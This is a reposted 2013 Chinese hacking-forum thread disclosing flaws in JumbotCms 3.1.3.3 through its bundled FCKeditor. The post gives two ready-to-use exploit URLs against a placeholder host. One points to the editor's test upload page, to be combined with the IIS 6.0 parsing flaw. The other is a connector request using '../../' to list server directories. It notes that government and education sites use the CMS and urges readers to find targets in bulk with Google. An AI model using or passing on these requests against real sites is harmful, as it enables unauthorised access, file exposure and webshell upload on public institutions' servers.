[转载]【将博CMS Powered by JumbotCms 】漏洞
本帖最后由 KingSKY 于 2013-10-28 16:33 编辑***********************
***转自法客论坛
***********************
由于工作关系检测某站的时候发现的他的URL比较特别 有个cmsfile的目录 ;扫了下目录 发现有fck 因为版本比较低,可以遍历目录
百度了一下没有人发,就发一下吧 比较低级的漏洞 ,一些政府和教育机构用的比较多
主要是FCKeditor的漏洞 版本忘记看了。。。。
程序名称:将博CMS通用版 JumbotCms
程序版本:3.1.3.3
利用方式:
利用IIS6.0解析漏洞
http://www.xxx.com/cmsfile/fckeditor/editor/filemanager/browser/default/connectors/test.htm
遍历目录漏洞
http://www.xxx.com/cmsfile/FCKeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=../../
不要拍砖,看客全当笑话
没事了自己去谷歌批量吧
Powered by JumbotCms 版本:3.1.3.3
在90sec发过 别拍哦
帖子的利用错误了。重新编辑一下 C4r1st 发表于 2013-10-28 16:33 static/image/common/back.gif
帖子的利用错误了。重新编辑一下
群里吐槽就可以了 - -! 楼上俩大牛。 楼上三大牛
页:
[1]